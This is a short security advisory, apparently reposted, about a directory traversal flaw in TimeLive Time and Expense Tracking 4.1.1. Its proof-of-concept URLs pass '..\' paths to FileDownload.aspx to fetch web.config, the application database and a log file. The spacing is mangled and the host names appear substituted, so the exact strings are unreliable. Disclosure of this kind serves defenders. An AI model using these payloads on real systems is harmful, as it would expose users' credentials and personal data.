Title: TimeLive Time and Expense Tracking <= Multiple Vulnerabilities
Defect category: Directory Traversal/Remote Database Download/File Download/Source Code Disclosure
Author: Nathaniel Carew www.2cto.com
Level: high
: Http://www.livetecs.com/Release/TimeLiveWebSetup.exe
Platform: ASP. NET
Version: 4.1.1
Test Platform: Windows Server Standard 2003 SP 2/IIS 6
Thank you: Peregrinus & shiznat
Overview:
---------
When using the import/export feature for csv/project/quickbooks files under:
Http://www.bkjia.com/TimeLive/AccountAdmin/AccountImportExport. aspx
You are able to modify the file download URL you are redirected too
And traverse directories to download the hosted files including the TimeLive database:
Proof of Concept:
-----------------
Http://www.bkjia.com/TimeLive/Shared/FileDownload. aspx? FileName = .. \ web. config
Http://www.bkjia.com/TimeLive/Shared/FileDownload. aspx? FileName = .. \ App_Data \ TimeLive. mdf
Http://www.bkjia.com/TimeLive/Shared/FileDownload. aspx? FileName = .. \ Log \ TimeLive. log
Impact:
-------
Successful exploitation cocould allow an attacker to download the complete database of users information
Including email addresses, usernames and passwords and associated timesheet and expense data along
Any files contained within the subfolder of wwwroot.